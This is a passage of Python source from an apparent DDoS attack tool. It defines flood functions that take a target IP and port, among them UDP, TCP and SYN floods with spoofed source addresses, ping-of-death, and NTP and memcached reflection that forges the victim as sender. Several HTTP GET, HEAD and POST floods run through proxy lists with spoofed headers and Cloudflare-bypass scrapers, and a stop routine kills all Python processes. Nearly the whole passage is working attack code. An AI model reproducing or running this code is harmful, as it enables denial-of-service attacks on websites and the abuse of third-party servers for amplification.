threading.Thread(target=syn, args=(event, timer), daemon=True).start() 121 | elif method == "mem": 122 | for _ in range(threads): 123 | threading.Thread(target=mem, args=(event, timer), daemon=True).start() 124 | elif method == "ntp": 125 | for _ in range(threads): 126 | threading.Thread(target=ntp, args=(event, timer), daemon=True).start() 127 | 128 | # layer3 129 | elif method == "icmp": 130 | for _ in range(threads): 131 | threading.Thread(target=icmp, args=(event, timer), daemon=True).start() 132 | elif method == "pod": 133 | for _ in range(threads): 134 | threading.Thread(target=pod, args=(event, timer), daemon=True).start() 135 | except: 136 | pass 137 | 138 | def random_data(): 139 | return str(Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( 140 | strings) + Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( 141 | strings)) 142 | 143 | 144 | def Headers(method): 145 | header = "" 146 | if method == "get" or method == "head": 147 | connection = "Connection: Keep-Alive\r\n" 148 | accept = Choice(acceptall) + "\r\n" 149 | referer = "Referer: " + referers + target + path + "\r\n" 150 | connection += "Cache-Control: max-age=0\r\n" 151 | connection += "pragma: no-cache\r\n" 152 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 153 | useragent = "User-Agent: " + UserAgent + "\r\n" 154 | header = referer + useragent + accept + connection + "\r\n\r\n" 155 | elif method == "cookie": 156 | connection = "Connection: Keep-Alive\r\n" 157 | more = "cache-control: no-cache\r\n" 158 | parm = "pragma: no-cache\r\n" 159 | up = "upgrade-insecure-requests: 1" 160 | connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n" 161 | accept = Choice(acceptall) + "\r\n" 162 | referer = "Referer: " + referers + target + path + "\r\n" 163 | useragent = "User-Agent: " + UserAgent + "\r\n" 164 | header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n" 165 | elif method == "brust": 166 | connection = "Connection: Keep-Alive\r\n" 167 | more = "Cache-Control: max-age=0\r\n" 168 | more2 = "Via: 1.0 PROXY\r\n" 169 | proxyd = str(proxy) 170 | xfor = "X-Forwarded-For: " + proxyd + "\r\n" 171 | accept = "Accept: */*\r\n" 172 | referer = "Referer: " + referers + target + path + "\r\n" 173 | useragent = "User-Agent: " + UserAgent + "\r\n" 174 | header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n" 175 | elif method == "even": 176 | up = "Upgrade-Insecure-Requests: 1\r\n" 177 | referer = "Referer: " + referers + target + path + "\r\n" 178 | useragent = "User-Agent: " + UserAgent + "\r\n" 179 | proxyd = str(proxy) 180 | xfor = "X-Forwarded-For: " + proxyd + "\r\n" 181 | header = referer + useragent + up + xfor + "\r\n\r\n" 182 | elif method == "ovh": 183 | accept = Choice(acceptall) + "\r\n" 184 | more = "Connection: keep-alive\r\n" 185 | connection = "Cache-Control: max-age=0\r\n" 186 | connection += "pragma: no-cache\r\n" 187 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 188 | up = "Upgrade-Insecure-Requests: 1\r\n" 189 | useragent = "User-Agent: " + UserAgent + "\r\n" 190 | header = useragent + more + accept + up + "\r\n\r\n" 191 | elif method == "pps": 192 | header = "GET / HTTP/1.1\r\n\r\n" 193 | elif method == "dyn": 194 | connection = "Connection: Keep-Alive\r\n" 195 | accept = Choice(acceptall) + "\r\n" 196 | connection += "Cache-Control: max-age=0\r\n" 197 | connection += "pragma: no-cache\r\n" 198 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 199 | referer = "Referer: " + referers + target + path + "\r\n" 200 | useragent = "User-Agent: " + UserAgent + "\r\n" 201 | header = referer + useragent + accept + connection + "\r\n\r\n" 202 | elif method == "socket": 203 | header = "" 204 | elif method == "null": 205 | connection = "Connection: null\r\n" 206 | accept = Choice(acceptall) + "\r\n" 207 | connection += "Cache-Control: max-age=0\r\n" 208 | connection += "pragma: no-cache\r\n" 209 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 210 | referer = "Referer: null\r\n" 211 | useragent = "User-Agent: null\r\n" 212 | header = referer + useragent + accept + connection + "\r\n\r\n" 213 | elif method == "post": 214 | post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 215 | content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" 216 | refer = "Referer: http://" + target + path + "\r\n" 217 | user_agent = "User-Agent: " + UserAgent + "\r\n" 218 | accept = Choice(acceptall) + "\r\n" 219 | connection = "Cache-Control: max-age=0\r\n" 220 | connection += "pragma: no-cache\r\n" 221 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 222 | data = str(random._urandom(8)) 223 | length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" 224 | header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" 225 | elif method == "hit": 226 | post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 227 | content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" 228 | refer = "Referer: http://" + target + path + "\r\n" 229 | user_agent = "User-Agent: " + UserAgent + "\r\n" 230 | connection = "Cache-Control: max-age=0\r\n" 231 | connection += "pragma: no-cache\r\n" 232 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 233 | accept = Choice(acceptall) + "\r\n" 234 | data = str(random._urandom(8)) 235 | length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" 236 | header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" 237 | return header 238 | 239 | 240 | def UrlFixer(original_url): 241 | global target, path, port, protocol 242 | original_url = original_url.strip() 243 | url = "" 244 | port = "" 245 | path = "/" 246 | clear_screen() 247 | for i in sys.argv: 248 | if (str(i).replace("="," ").split(" ")[0] == "ip"): 249 | url=str(str(i).replace("="," ").split(" ")[1]) 250 | if (str(i).replace("="," ").split(" ")[0] == "port"): 251 | port=str(str(i).replace("="," ").split(" ")[1]) 252 | while (url == ""): 253 | url = str(input("Insert IP/Web http://")) 254 | while (port == ""): 255 | port = str(input("Insert Port: ")) 256 | protocol = "http" 257 | tmp = url.split("/") 258 | if (port=="443"): 259 | protocol = "https" 260 | website = tmp[0] 261 | check = website.split(":") 262 | target = check[0] 263 | if len(tmp) > 1: 264 | path = url.replace(website, "", 1) 265 | 266 | 267 | def udp(event, timer): 268 | event.wait() 269 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 270 | while time.time() < timer: 271 | try: 272 | try: 273 | data = random._urandom(int(Intn(1024, 60000))) 274 | for _ in range(multiple): 275 | s.sendto(data, (str(target), int(port))) 276 | except: 277 | s.close() 278 | except: 279 | s.close() 280 | 281 | def icmp(event, timer): 282 | event.wait() 283 | while time.time() < timer: 284 | try: 285 | for _ in range(multiple): 286 | packet = random._urandom(int(Intn(1024, 60000))) 287 | pig(target, count=10, interval=0.2, payload_size=len(packet), payload=packet) 288 | except: 289 | pass 290 | 291 | ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4 292 | 293 | 294 | def ntp(event, timer): 295 | packets = Intn(10, 150) 296 | server = Choice(ntpsv) 297 | event.wait() 298 | while time.time() < timer: 299 | try: 300 | packet = ( 301 | IP(dst=server, src=target) 302 | / UDP(sport=Intn(1, 65535), dport=int(port)) 303 | / Raw(load=ntp_payload) 304 | ) 305 | try: 306 | for _ in range(multiple): 307 | send(packet, count=packets, verbose=False) 308 | except: 309 | pass 310 | except: 311 | pass 312 | 313 | 314 | mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 315 | 316 | 317 | def mem(event, timer): 318 | event.wait() 319 | packets = Intn(1024, 60000) 320 | server = Choice(memsv) 321 | while time.time() < timer: 322 | try: 323 | try: 324 | packet = ( 325 | IP(dst=server, src=target) 326 | / UDP(sport=port, dport=11211) 327 | / Raw(load=mem_payload) 328 | ) 329 | for _ in range(multiple): 330 | send(packet, count=packets, verbose=False) 331 | except: 332 | pass 333 | except: 334 | pass 335 | 336 | def tcp(event, timer): 337 | event.wait() 338 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 339 | 340 | while time.time() < timer: 341 | try: 342 | data = random._urandom(int(Intn(1024, 60000))) 343 | address = (str(target), int(port)) 344 | try: 345 | s.connect(address) 346 | for _ in range(multiple): 347 | s.send(data) 348 | except: 349 | s.close() 350 | except: 351 | s.close() 352 | 353 | def vse(event, timer): 354 | event.wait() 355 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 356 | while time.time() < timer: 357 | try: 358 | address = (str(target), int(port)) 359 | try: 360 | s.connect(address) 361 | for _ in range(multiple): 362 | s.send(data) 363 | except: 364 | s.close() 365 | except: 366 | s.close() 367 | class DNSQuery: 368 | def __init__(self, data): 369 | self.data = data 370 | self.dominio = '' 371 | self.DnsType = '' 372 | 373 | HDNS=data[-4:-2].encode("hex") 374 | if HDNS == "0001": 375 | self.DnsType='A' 376 | elif HDNS == "000f": 377 | self.DnsType='MX' 378 | elif HDNS == "0002": 379 | self.DnsType='NS' 380 | elif HDNS == "0010": 381 | self.DnsType="TXT" 382 | else: 383 | self.DnsType="Unknown" 384 | 385 | tipo = (ord(data[2]) >> 3) & 15 # Opcode bits 386 | if tipo == 0: # Standard query 387 | ini=12 388 | lon=ord(data[ini]) 389 | while lon != 0: 390 | self.dominio+=data[ini+1:ini+lon+1]+'.' 391 | ini+=lon+1 392 | lon=ord(data[ini]) 393 | def respuesta(self, ip): 394 | packet='' 395 | if self.dominio: 396 | packet+=self.data[:2] + "\x81\x80" 397 | packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts 398 | packet+=self.data[12:] # Original Domain Name Question 399 | packet+='\xc0\x0c' # Pointer to domain name 400 | packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes 401 | packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP 402 | return packet 403 | 404 | def dns(event, timer): 405 | event.wait() 406 | while time.time() < timer: 407 | try: 408 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 409 | s.bind(('',53)) 410 | data, addr = s.recvfrom(1024) 411 | p = DNSQuery(data) 412 | for _ in range(multiple): 413 | s.sendto(p.respuesta(target), addr) 414 | except: 415 | s.close() 416 | 417 | def syn(event, timer): 418 | event.wait() 419 | while time.time() < timer: 420 | try: 421 | IP_Packet = IP () 422 | IP_Packet.src = randomIP() 423 | IP_Packet.dst = target 424 | 425 | TCP_Packet = TCP () 426 | TCP_Packet.sport = randint(1, 65535) 427 | TCP_Packet.dport = int(port) 428 | TCP_Packet.flags = "S" 429 | TCP_Packet.seq = randint(1000, 9000) 430 | TCP_Packet.window = randint(1000, 9000) 431 | for _ in range(multiple): 432 | send(IP_Packet/TCP_Packet, verbose=0) 433 | except: 434 | pass 435 | 436 | 437 | def pod(event, timer): 438 | event.wait() 439 | while time.time() < timer: 440 | try: 441 | rand_addr = spoofer() 442 | ip_hdr = IP(src=rand_addr, dst=target) 443 | packet = ip_hdr / ICMP() / ("m" * 60000) 444 | send(packet) 445 | except: 446 | pass 447 | 448 | 449 | def stop(): 450 | print('All Attacks Stopped !') 451 | os.system('pkill python*') 452 | exit() 453 | 454 | 455 | def dyn(event, socks_type): 456 | header = Headers("dyn") 457 | proxy = Choice(proxies).strip().split(":") 458 | get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n" 459 | 460 | request = get_host + header 461 | event.wait() 462 | while time.time() < timer: 463 | try: 464 | s = socks.socksocket() 465 | if socks_type == 4: 466 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 467 | if socks_type == 5: 468 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 469 | if socks_type == 1: 470 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 471 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 472 | s.connect((str(target), int(port))) 473 | if protocol == "https": 474 | ctx = ssl.SSLContext() 475 | s = ctx.wrap_socket(s, server_hostname=target) 476 | try: 477 | for _ in range(multiple): 478 | s.send(str.encode(request)) 479 | except: 480 | s.close() 481 | except: 482 | s.close() 483 | 484 | 485 | def http(event, socks_type): 486 | header = Headers("get") 487 | proxy = Choice(proxies).strip().split(":") 488 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 489 | request = get_host + header 490 | event.wait() 491 | while time.time() < timer: 492 | try: 493 | s = socks.socksocket() 494 | if socks_type == 4: 495 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 496 | if socks_type == 5: 497 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 498 | if socks_type == 1: 499 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 500 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 501 | s.connect((str(target), int(port))) 502 | if protocol == "https": 503 | ctx = ssl.SSLContext() 504 | s = ctx.wrap_socket(s, server_hostname=target) 505 | try: 506 | for _ in range(multiple): 507 | s.send(str.encode(request)) 508 | except: 509 | s.close() 510 | except: 511 | s.close() 512 | 513 | def capb(event, socks_type): 514 | header = Headers("get") 515 | proxy = Choice(proxies).strip().split(":") 516 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 517 | request = get_host + header 518 | event.wait() 519 | while time.time() < timer: 520 | try: 521 | s = socks.socksocket() 522 | if socks_type == 4: 523 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 524 | if socks_type == 5: 525 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 526 | if socks_type == 1: 527 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 528 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 529 | s.connect((str(target), int(port))) 530 | if protocol == "https": 531 | ctx = ssl.SSLContext() 532 | s = ctx.wrap_socket(s, server_hostname=target) 533 | try: 534 | for _ in range(multiple): 535 | s.send(str.encode(request)) 536 | except: 537 | s.close() 538 | except: 539 | s.close() 540 | 541 | def ovh(event, socks_type): 542 | header = Headers("ovh") 543 | proxy = Choice(proxies).strip().split(":") 544 | get_host = "HEAD " + path + "/" + str(Intn(1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" 545 | request = get_host + header 546 | event.wait() 547 | while time.time() < timer: 548 | try: 549 | s = socks.socksocket() 550 | if socks_type == 4: 551 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 552 | if socks_type == 5: 553 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 554 | if socks_type == 1: 555 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 556 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 557 | s.connect((str(target), int(port))) 558 | if protocol == "https": 559 | ctx = ssl.SSLContext() 560 | s = ctx.wrap_socket(s, server_hostname=target) 561 | try: 562 | for _ in range(multiple): 563 | s.send(str.encode(request)) 564 | except: 565 | s.close() 566 | except: 567 | s.close() 568 | 569 | 570 | def pps(event, socks_type): 571 | proxy = Choice(proxies).strip().split(":") 572 | request = Headers("pps") 573 | event.wait() 574 | while time.time() < timer: 575 | try: 576 | s = socks.socksocket() 577 | if socks_type == 4: 578 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 579 | if socks_type == 5: 580 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 581 | if socks_type == 1: 582 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 583 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 584 | s.connect((str(target), int(port))) 585 | if protocol == "https": 586 | ctx = ssl.SSLContext() 587 | s = ctx.wrap_socket(s, server_hostname=target) 588 | try: 589 | for _ in range(multiple): 590 | s.send(str.encode(request)) 591 | except: 592 | s.close() 593 | except: 594 | s.close() 595 | 596 | 597 | def even(event, socks_type): 598 | global proxy 599 | proxy = Choice(proxies).strip().split(":") 600 | header = Headers("even") 601 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 602 | request = get_host + header 603 | event.wait() 604 | while time.time() < timer: 605 | try: 606 | s = socks.socksocket() 607 | if socks_type == 4: 608 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 609 | if socks_type == 5: 610 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 611 | if socks_type == 1: 612 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 613 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 614 | s.connect((str(target), int(port))) 615 | if protocol == "https": 616 | ctx = ssl.SSLContext() 617 | s = ctx.wrap_socket(s, server_hostname=target) 618 | try: 619 | for _ in range(multiple): 620 | s.send(str.encode(request)) 621 | except: 622 | s.close() 623 | except: 624 | s.close() 625 | 626 | 627 | def brust(event, socks_type): 628 | global proxy 629 | proxy = Choice(proxies).strip().split(":") 630 | header = Headers("brust") 631 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 632 | request = get_host + header 633 | event.wait() 634 | while time.time() < timer: 635 | try: 636 | s = socks.socksocket() 637 | if socks_type == 4: 638 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 639 | if socks_type == 5: 640 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 641 | if socks_type == 1: 642 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 643 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 644 | s.connect((str(target), int(port))) 645 | if protocol == "https": 646 | ctx = ssl.SSLContext() 647 | s = ctx.wrap_socket(s, server_hostname=target) 648 | try: 649 | for _ in range(multiple): 650 | s.send(str.encode(request)) 651 | except: 652 | s.close() 653 | except: 654 | s.close() 655 | 656 | 657 | def cookie(event, socks_type): 658 | proxy = Choice(proxies).strip().split(":") 659 | header = Headers("cookie") 660 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 661 | request = get_host + header 662 | event.wait() 663 | while time.time() < timer: 664 | try: 665 | s = socks.socksocket() 666 | if socks_type == 4: 667 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 668 | if socks_type == 5: 669 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 670 | if socks_type == 1: 671 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 672 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 673 | s.connect((str(target), int(port))) 674 | if protocol == "https": 675 | ctx = ssl.SSLContext() 676 | s = ctx.wrap_socket(s, server_hostname=target) 677 | try: 678 | for _ in range(multiple): 679 | s.send(str.encode(request)) 680 | except: 681 | s.close() 682 | except: 683 | s.close() 684 | 685 | 686 | def cfb(event, socks_type): 687 | header = Headers("get") 688 | proxy = Choice(proxies).strip().split(":") 689 | get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 690 | request = get_host + header 691 | event.wait() 692 | while time.time() < timer: 693 | try: 694 | s = socks.socksocket() 695 | if socks_type == 4: 696 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 697 | if socks_type == 5: 698 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 699 | if socks_type == 1: 700 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 701 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 702 | s.connect((str(target), int(port))) 703 | if protocol == "https": 704 | ctx = ssl.SSLContext() 705 | s = ctx.wrap_socket(s, server_hostname=target) 706 | cfscrape.create_scraper(sess=s) 707 | try: 708 | for _ in range(multiple): 709 | s.sendall(str.encode(request)) 710 | except: 711 | s.close() 712 | except: 713 | s.close() 714 | 715 | 716 | # def tor(event, socks_type): 717 | # event.wait() 718 | # while time.time() < timer: 719 | # with tor_requests_session() as s: 720 | # s.get(sys.argv[2]) 721 | 722 | 723 | def AVB(event, socks_type): 724 | proxy = Choice(proxies).strip().split(":") 725 | event.wait() 726 | payload = str(random._urandom(64)) 727 | while time.time() < timer: 728 | try: 729 | s = cfscrape.create_scraper() 730 | if socks_type == 5 or socks_type == 4: 731 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 732 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 733 | if socks_type == 1: 734 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 735 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 736 | if protocol == "https": 737 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 738 | try: 739 | for _ in range(multiple): 740 | s.post(sys.argv[2], timeout=1, data=payload) 741 | except: 742 | s.close() 743 | except: 744 | s.close() 745 | 746 | 747 | def bypass(event, socks_type): 748 | proxy = Choice(proxies).strip().split(":") 749 | event.wait() 750 | payload = str(random._urandom(64)) 751 | while time.time() < timer: 752 | try: 753 | s = requests.Session() 754 | if socks_type == 5 or socks_type == 4: 755 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 756 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 757 | if socks_type == 1: 758 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 759 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 760 | if protocol == "https": 761 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 762 | try: 763 | for _ in range(multiple): 764 | s.post(sys.argv[2], timeout=1, data=payload) 765 | except: 766 | s.close() 767 | except: 768 | s.close() 769 | 770 | 771 | def dgb(event, socks_type): 772 | proxy = Choice(proxies).strip().split(":") 773 | event.wait() 774 | while time.time() < timer: 775 | try: 776 | s = cfscrape.create_scraper() 777 | if socks_type == 5 or socks_type == 4: 778 | s.proxies['http'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 779 | s.proxies['https'] = 'socks{}://'.format(socks_type) + str(proxy[0]) + ":" + str(proxy[1]) 780 | if socks_type == 1: 781 | s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str(proxy[1]) 782 | s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str(proxy[1]) 783 | if protocol == "https": 784 | s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" 785 | try: 786 | sleep(5) 787 | for _ in range(multiple): 788 | s.get(sys.argv[2]) 789 | except: 790 | s.close() 791 | except: 792 | s.close() 793 | 794 | 795 | def head(event, socks_type): 796 | proxy = Choice(proxies).strip().split(":") 797 | header = Headers("head") 798 | head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 799 | request = head_host + header 800 | event.wait() 801 | while time.time() < timer: 802 | try: 803 | s = socks.socksocket() 804 | if socks_type == 4: 805 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 806 | if socks_type == 5: 807 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 808 | if socks_type == 1: 809 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 810 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 811 | s.connect((str(target), int(port))) 812 | if protocol == "https": 813 | ctx = ssl.SSLContext() 814 | s = ctx.wrap_socket(s, server_hostname=target) 815 | try: 816 | for _ in range(multiple): 817 | s.send(str.encode(request)) 818 | except: 819 | s.close() 820 | except: 821 | s.close() 822 | 823 | 824 | def null(event, socks_type): 825 | proxy = Choice(proxies).strip().split(":") 826 | header = Headers("null") 827 | head_host = "HEAD " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + target + "\r\n" 828 | request = head_host + header 829 | event.wait() 830 | while time.time() < timer: 831 | try: 832 | s = socks.socksocket() 833 | if socks_type == 4: 834 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 835 | if socks_type == 5: 836 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 837 | if socks_type == 1: 838 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 839 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 840 | s.connect((str(target), int(port))) 841 | if protocol == "https": 842 | ctx = ssl.SSLContext() 843 | s = ctx.wrap_socket(s, server_hostname=target) 844 | try: 845 | for _ in range(multiple): 846 | s.send(str.encode(request)) 847 | except: 848 | s.close() 849 | except: 850 | s.close() 851 | 852 | 853 | def gsb(event, socks_type): 854 | proxy = Choice(proxies).strip().split(":") 855 | header = Headers("head") 856 | head_host = "HEAD " + path + "?q=" + str(Intn(000000000, 999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" 857 | request = head_host + header 858 | event.wait() 859 | while time.time() < timer: 860 | try: 861 | s = socks.socksocket() 862 | if socks_type == 4: 863 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 864 | if socks_type == 5: 865 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 866 | if socks_type == 1: 867 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 868 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 869 | s.connect((str(target), int(port))) 870 | if protocol == "https": 871 | ctx = ssl.SSLContext() 872 | s = ctx.wrap_socket(s, server_hostname=target) 873 | try: 874 | sleep(5) 875 | for _ in range(multiple): 876 | s.send(str.encode(request)) 877 | except: 878 | s.close() 879 | except: 880 | s.close() 881 | 882 | 883 | def hit(event, timer): 884 | global s 885 | request = Headers("hit") 886 | event.wait() 887 | while time.time() < timer: 888 | try: 889 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 890 | s.connect((str(target), int(port))) 891 | try: 892 | for _ in range(multiple): 893 | s.sendall(str.encode(request)) 894 | except: 895 | s.close() 896 | except: 897 | s.close() 898 | 899 | 900 | def cfbc(event, socks_type): 901 | request = Headers("cfb") 902 | event.wait() 903 | while time.time() < timer: 904 | try: 905 | s = socks.socksocket() 906 | if socks_type == 4: 907 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 908 | if socks_type == 5: 909 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 910 | if socks_type == 1: 911 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 912 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 913 | s.connect((str(target), int(port))) 914 | if protocol == "https": 915 | ctx = ssl.SSLContext() 916 | s = ctx.wrap_socket(s, server_hostname=target) 917 | try: 918 | for _ in range(multiple): 919 | s.sendall(str.encode(request)) 920 | except: 921 | s.close() 922 | except: 923 | s.close() 924 | 925 | 926 | def post(event, socks_type): 927 | request = Headers("post") 928 | proxy = Choice(proxies).strip().split(":") 929 | event.wait() 930 | while time.time() < timer: 931 | try: 932 | s = socks.socksocket() 933 | if socks_type == 4: 934 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 935 | if socks_type == 5: 936 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 937 | if socks_type == 1: 938 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 939 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 940 | s.connect((str(target), int(port))) 941 | if protocol == "https": 942 | ctx = ssl.SSLContext() 943 | s = ctx.wrap_socket(s, server_hostname=target) 944 | try: 945 | for _ in range(multiple): 946 | s.sendall(str.encode(request)) 947 | except: 948 | s.close() 949 | except: 950 | s.close() 951 | 952 | 953 | def stress(event, socks_type): 954 | request = Headers("stress") 955 | proxy = Choice(proxies).strip().split(":") 956 | event.wait() 957 | while time.time() < timer: 958 | try: 959 | s = socks.socksocket() 960 | if socks_type == 4: 961 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 962 | if socks_type == 5: 963 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 964 | if socks_type == 1: 965 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 966 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 967 | s.connect((str(target), int(port))) 968 | if protocol == "https": 969 | ctx = ssl.SSLContext() 970 | s = ctx.wrap_socket(s, server_hostname=target) 971 | try: 972 | for _ in range(multiple): 973 | s.sendall(str.encode(request)) 974 | except: 975 | s.close() 976 | except: 977 | s.close() 978 | 979 | 980 | def ostress(event, timer): 981 | request = Headers("stress") 982 | event.wait() 983 | while time.time() < timer: 984 | try: 985 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 986 | s.connect((str(target), int(port))) 987 | try: 988 | for _ in range(multiple): 989 | s.sendall(str.encode(request)) 990 | except: 991 | s.close() 992 | except: 993 | s.close() 994 | 995 | 996 | socket_list = [] 997 | t = 0 998 | 999 | def slow(conn, socks_type): 1000 | global t 1001 | proxy = Choice(proxies).strip().split(":") 1002 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 1003 | 